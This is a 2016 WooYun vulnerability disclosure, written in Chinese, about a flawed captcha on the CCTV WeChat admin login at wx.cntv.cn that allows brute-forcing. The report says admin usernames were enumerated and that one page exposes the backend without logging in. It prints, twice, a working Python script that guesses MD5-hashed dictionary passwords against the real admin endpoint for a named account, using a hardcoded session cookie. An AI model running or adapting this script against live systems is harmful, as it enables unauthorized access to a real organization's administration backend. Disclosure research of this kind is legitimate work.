央视某重要系统设计缺陷导致可爆破(附爆破脚本) | wooyun-2016-0173681

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0173681

漏洞标题：

央视某重要系统设计缺陷导致可爆破(附爆破脚本)

漏洞详情

披露状态：

2016-01-29：细节已通知厂商并且等待厂商处理中
2016-02-03：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

年底了，听说要让三只搅屎棍上春晚，我说还不如让猴哥上。

详细说明：

存在漏洞的站点在
央视公众号管理平台
http://wx.cntv.cn/mp/login.html

加上admin就是超级管理员后台

这个地方的验证码设计是有缺陷的，导致可以爆破用户名和密码，先来尝试爆破几个用户名
爆出的两位超级管理员用户名

爆出的三位普通管理员

普通管理员在超级管理员页面登录的时候会提示没有权限

超级管理员则会提示输错密码

密码部分是经过md5加密的

编写爆破脚本测试之

另外本平台本身也有些bug
直接访问http://wx.cntv.cn/pannel.html，也是能一窥后台全貌的

然而并没有用，只能算个bug。
爆破脚本
手里字典不够强大，没有爆破出来。
可以换强大的字典尝试一下。
需要抓包把cookie修改成你自己的，并且填入页面中显示的验证码。

# -*- coding: utf-8 -*-
import md5
import requests
def crypt( str ):
	m = md5.new()
	m.update(str)
	return m.hexdigest()
	
target = "http://wx.cntv.cn/admin/login/invaild.html"
vcode = "fxg5"
cookie = 'vjuids=-6fcdfeb6.15286b22d4b.0.ab75c7f36e7b; vjlast=1453958770.1453958770.30; wdcid=30aaf6ab9c552d55; __gads=ID=36e2fcc6c3d14393:T=1453958771:S=ALNI_MYmCxw1JJB4sbqHG9hq5TWja7AtBg; cntv_mail_usr=qq3131798654; m_cntv_app=; BLOG_NEW_cntv_sid=5uu5u5; PHPSESSID=j1pd7qfam7v8u7a78u5pnku1b5'
headers = {
	'Host':'wx.cntv.cn',
	'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7',
	'Accept':'application/json, text/javascript, */*; q=0.01',
	'Content-Type':'application/x-www-form-urlencoded',
	'Referer':'http://wx.cntv.cn/admin/login.html',
	'Cookie':cookie,
	'Connection':'keep-alive'
}
dic = open('D:\dic1.txt')
for line in dic:
	passwd = line.split("\n")[0]
	passwd_hash = crypt( passwd )
	data = {"do_login":"true",
		"username":"lsz",
		"password":passwd_hash,
		"verifyCode":vcode
	}
	try:
		r = requests.post( target, data = data, headers= headers )
		if r.status_code == 200:
			#print r.text
			result = r.json()
			if result["e"] == "9008":
				print u'%s %s\t尝试:%s' % (  result["e"], result["m"], passwd )
			else:
				print u'%s %s\t尝试:%s' % (  result["e"], result["m"], passwd )
				break
	except Exception, e:
		print str(e)

漏洞证明：

存在漏洞的站点在
央视公众号管理平台
http://wx.cntv.cn/mp/login.html

加上admin就是超级管理员后台

这个地方的验证码设计是有缺陷的，导致可以爆破用户名和密码，先来尝试爆破几个用户名
爆出的两位超级管理员用户名

爆出的三位普通管理员

普通管理员在超级管理员页面登录的时候会提示没有权限

超级管理员则会提示输错密码

密码部分是经过md5加密的

编写爆破脚本测试之

另外本平台本身也有些bug
直接访问http://wx.cntv.cn/pannel.html，也是能一窥后台全貌的

# -*- coding: utf-8 -*-
import md5
import requests
def crypt( str ):
	m = md5.new()
	m.update(str)
	return m.hexdigest()
	
target = "http://wx.cntv.cn/admin/login/invaild.html"
vcode = "fxg5"
cookie = 'vjuids=-6fcdfeb6.15286b22d4b.0.ab75c7f36e7b; vjlast=1453958770.1453958770.30; wdcid=30aaf6ab9c552d55; __gads=ID=36e2fcc6c3d14393:T=1453958771:S=ALNI_MYmCxw1JJB4sbqHG9hq5TWja7AtBg; cntv_mail_usr=qq3131798654; m_cntv_app=; BLOG_NEW_cntv_sid=5uu5u5; PHPSESSID=j1pd7qfam7v8u7a78u5pnku1b5'
headers = {
	'Host':'wx.cntv.cn',
	'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7',
	'Accept':'application/json, text/javascript, */*; q=0.01',
	'Content-Type':'application/x-www-form-urlencoded',
	'Referer':'http://wx.cntv.cn/admin/login.html',
	'Cookie':cookie,
	'Connection':'keep-alive'
}
dic = open('D:\dic1.txt')
for line in dic:
	passwd = line.split("\n")[0]
	passwd_hash = crypt( passwd )
	data = {"do_login":"true",
		"username":"lsz",
		"password":passwd_hash,
		"verifyCode":vcode
	}
	try:
		r = requests.post( target, data = data, headers= headers )
		if r.status_code == 200:
			#print r.text
			result = r.json()
			if result["e"] == "9008":
				print u'%s %s\t尝试:%s' % (  result["e"], result["m"], passwd )
			else:
				print u'%s %s\t尝试:%s' % (  result["e"], result["m"], passwd )
				break
	except Exception, e:
		print str(e)

修复方案：

1.重新修改验证码逻辑
2.对后台敏感页面稍微做一些限制
3.真的不考虑我猴哥吗

版权声明：转载请注明来源齐天大圣@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-02-03 17:20

厂商回复：

漏洞Rank：8 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源齐天大圣@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 齐天大圣@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源齐天大圣@乌云